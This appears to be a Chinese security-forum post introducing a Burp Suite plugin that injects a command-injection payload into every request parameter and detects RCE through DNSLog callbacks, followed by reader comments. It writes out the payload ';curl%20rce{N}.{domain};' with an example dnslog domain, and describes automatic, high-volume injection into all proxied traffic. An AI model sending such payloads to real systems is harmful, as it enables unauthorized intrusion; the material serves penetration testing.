RCE哨兵 - 2026哨兵系列第一弹
RCE 哨兵 (RCE-SB)
一款专为 Burp Suite 设计的远程代码执行漏洞检测插件 自动化跟踪所有参数,塞入payload,暴力RCE (用这个插件黑盒挖过几个RCE 不喜勿喷)
📖 工具介绍
RCE 哨兵是一款高效的 Burp Suite 扩展插件,专注于检测 HTTP 请求中的潜在远程代码执行(RCE)漏洞。它能够自动捕获 GET 和 POST 请求,将用户指定的 Payload 注入到请求参数中,并生成新的测试请求。
✨ 主要特性
- 🎯 自动化测试:自动捕获并测试 HTTP 请求中的所有参数
- 🔄 双重注入模式:支持参数值替换和追加两种注入方式
- 📦 多格式支持:完美处理
application/x-www-form-urlencoded、multipart/form-data和application/json格式 - 🚫 智能过滤:自动过滤静态资源文件(js、css、图片等)
- 🔍 去重机制:避免重复测试相同的请求
- 📊 实时监控:实时显示测试结果,包括时间、URL、响应码等信息
- 🔗 联动集成:支持一键发送到 Burp Repeater 进行深度测试
🚀 使用方法
1. 配置 Payload
- 在插件标签页中找到 "RCE 哨兵"
- 在 Payload 输入框中填入你的 DNSLog 域名或外带平台域名【建议使用Burp自带的dnslog】
- 例如:
xxx.dnslog.cn或xxx.ceye.io
- 例如:
- 点击 "保存 Payload" 按钮
2. 启动插件
- 点击 "开启插件" 按钮
- 状态栏显示 "[+] RCE哨兵已启动"
- 开始正常浏览目标网站,插件会自动测试
3. 查看结果
- 表格中会实时显示所有测试请求
- 点击表格行可在下方查看完整的请求和响应数据包
- 右键点击表格行可将请求发送到 Repeater
📝 工作原理
- 捕获请求:监听 Burp Proxy 中的 HTTP 请求
- 参数提取:提取 GET/POST 参数,支持 URL 参数、表单数据和 JSON 数据
- Payload 注入:对每个参数生成唯一的 RCE 编号,构造测试 Payload
- 发送测试:
- 方式一:替换原参数值为恶意 Payload
- 方式二:在原参数值后追加恶意 Payload
- 结果记录:记录响应状态码、时间等信息,方便后续分析
🔧 Payload 格式
插件会自动构造如下格式的 Payload:
;curl%20rce{编号}.{你的域名};
示例:
- 配置域名:
xxx.dnslog.cn - 生成 Payload:
;curl%20rce1.xxx.dnslog.cn;
📋 支持的数据格式
- ✅ GET 请求参数
- ✅ POST application/x-www-form-urlencoded
- ✅ POST multipart/form-data
- ✅ POST application/json (支持嵌套 JSON)
⚠️ 注意事项
- 仅用于授权的安全测试,请勿用于非法用途
- 建议配合 DNSLog 或 Ceye 等外带平台使用
- 插件会自动过滤常见静态资源,减少无效请求
- 开启插件后会对所有请求进行测试,可能产生大量流量
📄 结束语
祝大家2026新年快乐,哨兵系列还有几个工具,我会一一发出来,都是burp工具。
⚡ 下载
自评TCV:1




评论15次
感谢师傅的新年礼物
之前Log4j2 RCE的时候就写过一款:https://github.com/gh0stkey/FuckAnywhere
太简单了些吧,测了半天怎么就;注入?另外,内网不出网的话全GG,可以考虑延迟,使用ping是不是会更好?回显,延迟,dnslog,三重特征,漏检大大降低。
收到 下次更新版本的时候加上 很不错的建议
感觉有点危险啊,会不会直接给xi统搞崩了
这个主要看怎么用 在哪用 我有的时候黑盒我就开着挂着 但是我还有一种使用场景就是本地搭建环境做测试的时候开着 暴力搞
感觉有点危险啊,会不会直接给xi统搞崩了
太简单了些吧,测了半天怎么就;注入?另外,内网不出网的话全GG,可以考虑延迟,使用ping是不是会更好?回显,延迟,dnslog,三重特征,漏检大大降低。
可以啊 顶起来😄
今年必须要投你一票
这个小工具很可以啊 有时候也可以在后台getshell的时候试试 很赞
会不会卡?像之前用过的历史敏感信息插件,历史多了就卡
不会的
会不会卡?像之前用过的历史敏感信息插件,历史多了就卡
之前基于log4j的哪个插件改过一个版本,就是所有有参数的位置都插上payload
期待期待,但是话说,又被坑走3个TuBi,哈哈哈,我看工具不是网站上有吗。哈哈
不错不错,下来试试效果
这个去重机制就很不错,很多插件总是重复扫描